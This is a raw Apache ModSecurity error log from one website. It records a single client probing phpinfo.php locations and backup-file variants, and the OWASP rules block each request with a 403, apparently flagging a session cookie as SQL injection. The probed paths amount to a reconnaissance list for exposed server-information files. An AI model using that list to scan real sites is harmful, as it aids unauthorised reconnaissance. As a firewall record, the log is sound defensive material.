[Mon May 11 14:10:45.564761 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/webroot/index.php/_environment"] [unique_id "agHHRay-5-wpj6Sx56aBdAAAABU"]
[Mon May 11 14:10:45.757531 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mail/phpinfo.php"] [unique_id "agHHRay-5-wpj6Sx56aBdQAAABU"]
[Mon May 11 14:10:45.757735 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mail/phpinfo.php"] [unique_id "agHHRay-5-wpj6Sx56aBdQAAABU"]
[Mon May 11 14:10:45.757981 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mail/phpinfo.php"] [unique_id "agHHRay-5-wpj6Sx56aBdQAAABU"]
[Mon May 11 14:10:45.984762 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cpanel/phpinfo.php"] [unique_id "agHHRay-5-wpj6Sx56aBdgAAABU"]
[Mon May 11 14:10:45.984957 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cpanel/phpinfo.php"] [unique_id "agHHRay-5-wpj6Sx56aBdgAAABU"]
[Mon May 11 14:10:45.985219 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cpanel/phpinfo.php"] [unique_id "agHHRay-5-wpj6Sx56aBdgAAABU"]
[Mon May 11 14:10:46.168538 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/hosting/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBdwAAABU"]
[Mon May 11 14:10:46.168755 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/hosting/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBdwAAABU"]
[Mon May 11 14:10:46.169005 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/hosting/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBdwAAABU"]
[Mon May 11 14:10:46.422464 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/webmail/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBeQAAABU"]
[Mon May 11 14:10:46.422684 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/webmail/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBeQAAABU"]
[Mon May 11 14:10:46.423071 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/webmail/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBeQAAABU"]
[Mon May 11 14:10:46.653673 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/smtp/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBegAAABU"]
[Mon May 11 14:10:46.653886 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/smtp/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBegAAABU"]
[Mon May 11 14:10:46.654181 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/smtp/phpinfo.php"] [unique_id "agHHRqy-5-wpj6Sx56aBegAAABU"]
[Mon May 11 14:10:46.821423 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.bak"] [unique_id "agHHRqy-5-wpj6Sx56aBewAAABU"]
[Mon May 11 14:10:46.821601 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.bak"] [unique_id "agHHRqy-5-wpj6Sx56aBewAAABU"]
[Mon May 11 14:10:46.821837 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.bak"] [unique_id "agHHRqy-5-wpj6Sx56aBewAAABU"]
[Mon May 11 14:10:46.912199 2026] [core:error] [pid 1319953:tid 1319978] [client 52.242.216.199:59531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:46.912230 2026] [core:error] [pid 1319953:tid 1319978] [client 52.242.216.199:59531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:46.989092 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.old"] [unique_id "agHHRqy-5-wpj6Sx56aBfAAAABU"]
[Mon May 11 14:10:46.989312 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.old"] [unique_id "agHHRqy-5-wpj6Sx56aBfAAAABU"]
[Mon May 11 14:10:46.989540 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.old"] [unique_id "agHHRqy-5-wpj6Sx56aBfAAAABU"]
[Mon May 11 14:10:47.240798 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php~"] [unique_id "agHHR6y-5-wpj6Sx56aBfQAAABU"]
[Mon May 11 14:10:47.241007 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php~"] [unique_id "agHHR6y-5-wpj6Sx56aBfQAAABU"]
[Mon May 11 14:10:47.241267 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php~"] [unique_id "agHHR6y-5-wpj6Sx56aBfQAAABU"]
[Mon May 11 14:10:47.424758 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/info.php.bak"] [unique_id "agHHR6y-5-wpj6Sx56aBfwAAABU"]
[Mon May 11 14:10:47.424927 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/info.php.bak"] [unique_id "agHHR6y-5-wpj6Sx56aBfwAAABU"]
[Mon May 11 14:10:47.425144 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/info.php.bak"] [unique_id "agHHR6y-5-wpj6Sx56aBfwAAABU"]
[Mon May 11 14:10:47.623598 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.save"] [unique_id "agHHR6y-5-wpj6Sx56aBgAAAABU"]
[Mon May 11 14:10:47.623830 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.save"] [unique_id "agHHR6y-5-wpj6Sx56aBgAAAABU"]
[Mon May 11 14:10:47.624050 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.save"] [unique_id "agHHR6y-5-wpj6Sx56aBgAAAABU"]
[Mon May 11 14:10:47.801528 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/staging/phpinfo.php"] [unique_id "agHHR6y-5-wpj6Sx56aBgQAAABU"]
[Mon May 11 14:10:47.801720 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/staging/phpinfo.php"] [unique_id "agHHR6y-5-wpj6Sx56aBgQAAABU"]
[Mon May 11 14:10:47.801940 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/staging/phpinfo.php"] [unique_id "agHHR6y-5-wpj6Sx56aBgQAAABU"]
[Mon May 11 14:10:47.975131 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/beta/phpinfo.php"] [unique_id "agHHR6y-5-wpj6Sx56aBggAAABU"]
[Mon May 11 14:10:47.975338 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/beta/phpinfo.php"] [unique_id "agHHR6y-5-wpj6Sx56aBggAAABU"]
